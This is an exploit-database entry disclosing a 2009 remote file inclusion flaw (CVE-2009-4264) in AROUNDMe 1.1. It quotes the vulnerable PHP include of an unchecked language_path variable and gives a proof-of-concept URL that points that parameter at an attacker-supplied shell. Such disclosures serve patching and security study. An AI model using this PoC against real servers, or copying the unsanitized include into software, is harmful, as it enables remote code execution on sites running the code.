AROUNDMe 1.1 - 'language_path' Remote File Inclusion

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-12-05 
date_updated:  
verified: 1 
codes: OSVDB-60683;CVE-2009-4264 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comaroundme_1_1.tar.gz

   [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       <?php
           include_once($language_path . 'connect.lang.php');
       ?>
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]